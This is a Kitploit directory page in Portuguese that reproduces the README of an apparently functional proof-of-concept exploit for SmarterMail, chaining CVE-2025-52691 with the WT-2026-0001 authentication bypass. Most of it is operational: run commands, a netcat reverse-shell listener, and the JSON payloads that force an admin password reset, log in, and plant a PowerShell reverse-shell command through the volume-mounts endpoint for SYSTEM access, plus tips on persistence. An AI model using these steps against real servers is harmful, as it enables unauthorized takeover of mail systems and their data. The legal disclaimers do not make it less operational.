Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC: Baseado no artigo da watchtowr WT-2026-0001 sobre um exploit de bypass de autenticação, este é um script de ataque Python funcional. | Kitploit
Ferramentas/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed TeamingFerramenta de Acesso Remoto
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: Baseado no artigo da watchtowr WT-2026-0001 sobre um exploit de bypass de autenticação, este é um script de ataque Python funcional.

Ver Repositório
7há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-52691 / WT-2026-0001 Exploit do SmarterMail

🚨 AVISO IMPORTANTE

Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais!

  • O uso não autorizado é ilegal e antiético
  • Use apenas em sistemas com autorização explícita
  • Use por sua conta e risco
  • Os usuários são responsáveis pelo cumprimento de todas as leis aplicáveis

📋 Visão Geral

Este exploit combina duas vulnerabilidades críticas no SmarterMail:

  1. CVE-2025-52691: Execução Remota de Código Pré-Autenticação via Upload de Arquivo
    • Pontuação CVSS: 10.0 (Crítico)
    • Versões Afetadas: Build 9406 e anteriores, Build 16.3.6989.16341 e anteriores
    • Versões Corrigidas: Build 9413 e posteriores

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: Bypass de Autenticação via Redefinição de Senha
    • CVE-ID não atribuído
    • Versões Afetadas: Até o Build 9510
    • Versões Corrigidas: Build 9511 (15 de janeiro de 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

Vetor de Ataque

O exploit realiza um ataque em 3 fases:

  1. Fase 1: Bypass de Autenticação via WT-2026-0001

    • Altera a senha do administrador sem verificação da senha antiga
  2. Fase 2: Login do Administrador com a nova senha

    • Autentica na Interface Web do SmarterMail
  3. Fase 3: RCE através da funcionalidade de Montagens de Volume

    • Cria uma Montagem de Volume com Comando de Reverse Shell
    • Executa comandos do SO com privilégios de SYSTEM

Pré-requisitos

Requisitos do Sistema

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

Instruções de Instalação

root@kitploit:~
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

Instalar Dependências

root@kitploit:~
# Python dependencies (if needed)
pip3 install requests

Início Rápido

Método 1: Configuração Automatizada (Recomendado)

root@kitploit:~
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh

Método 2: Execução Direta

root@kitploit:~
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Método 3: Com Todas as Opções

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

Instruções Detalhadas

Passo 1: Preparação

  1. Identificação do Alvo

    root@kitploit:~
    # Check target host
    curl -I http://192.168.1.100:9998
    
    # Identify SmarterMail version
    # (Usually in login page or HTTP headers)
    
  2. Configuração do Listener

    root@kitploit:~
    # In Terminal 1: Start listener
    nc -lvnp 4444
    
    # The listener must be running before the exploit is executed
    
  3. Validação de Rede

    root@kitploit:~
    # Ensure connection between attacker and target is possible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

Passo 2: Execução do Exploit

root@kitploit:~
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Passo 3: Após o Exploit

  1. Conexão Shell

    root@kitploit:~
    # In the listener terminal, a connection should now appear
    # You should have a SYSTEM shell
    
  2. Verificar Acesso

    root@kitploit:~
    # In the obtained shell
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. Acesso Persistente

    root@kitploit:~
    # Optional: Set up persistence
    # Windows: Install as service
    # Linux: Cron job or systemd service
    

🔧 Opções de Configuração

Parâmetros do Exploit.py

ParâmetroDescriçãoValor Padrão
-H, --hostHost alvo (obrigatório)-
-P, --portPorta alvo9998
-A, --attacker-ipIP do atacante para reverse shell (obrigatório)-
-p, --attacker-portPorta do atacante para reverse shell (obrigatório)-
-d, --debugAtivar modo de depuraçãoFalse
--admin-usernameNome de usuário do administradoradmin
--new-passwordNova senha do administradorNewPassword123!@#

Parâmetros do Run_Exploit.sh

ParâmetroDescrição
-t, --targetHost alvo
-p, --portPorta alvo
-a, --attacker-ipIP do atacante
-l, --listener-portPorta do listener
-n, --new-passwordNova senha do administrador
-u, --admin-userNome de usuário do administrador
-d, --debugModo de depuração
--autoModo automatizado

Exemplos

Exemplo 1: Uso Básico

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Exemplo 2: Com Credenciais Personalizadas

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

Exemplo 3: Modo de Depuração

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

Exemplo 4: Configuração Automatizada

root@kitploit:~
./run_exploit.sh --auto

Detalhes Técnicos

Fase 1: Bypass de Autenticação

Endpoint: POST /api/v1/auth/force-reset-password

Payload:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

Resposta de Sucesso:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

Fase 2: Login do Administrador

Endpoint: POST /api/v1/auth/login

Payload:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

Fase 3: RCE via Montagens de Volume

Endpoint: POST /api/v1/settings/volume-mounts

Payload:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

Solução de Problemas

Problemas Comuns

1. Porta bloqueada

root@kitploit:~
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998

2. Listener inacessível

root@kitploit:~
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444

3. Autenticação falhou

root@kitploit:~
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)

5. RCE falhou

root@kitploit:~
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system

Modo de Depuração

Ative o modo de depuração para saída detalhada:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ Notas de Segurança

Aspectos Legais

  • Realize apenas testes autorizados
  • Obtenha permissão por escrito
  • Garanta o cumprimento das leis locais
  • Nenhum teste em sistemas de produção

Precauções de Segurança

  1. Ambiente de Teste: Sempre teste em ambientes controlados
  2. Validação do Alvo: Certifique-se de que o alvo é um sistema de teste
  3. Isolamento de Rede: Separe os sistemas de teste da rede de produção
  4. Documentação: Documente todos os testes
  5. Limpeza: Remova todos os vestígios após o teste

Uso Responsável

  • Não cause danos
  • Não roube ou manipule dados
  • Não desabilite sistemas
  • Seja transparente com as partes responsáveis

Atualizações e Manutenção

Notas de Versão

  • v1.0: Versão inicial com funcionalidade completa
  • Atualizações Futuras: Melhorias no tratamento de erros e estabilidade

🙏 Agradecimentos

  • watchTowr Labs pela pesquisa original
  • Comunidade de Pesquisa em Segurança pelo suporte
  • Todos que contribuíram para melhorias

⚠️ Lembre-se: Com grandes poderes vêm grandes responsabilidades!

Baixar ferramenta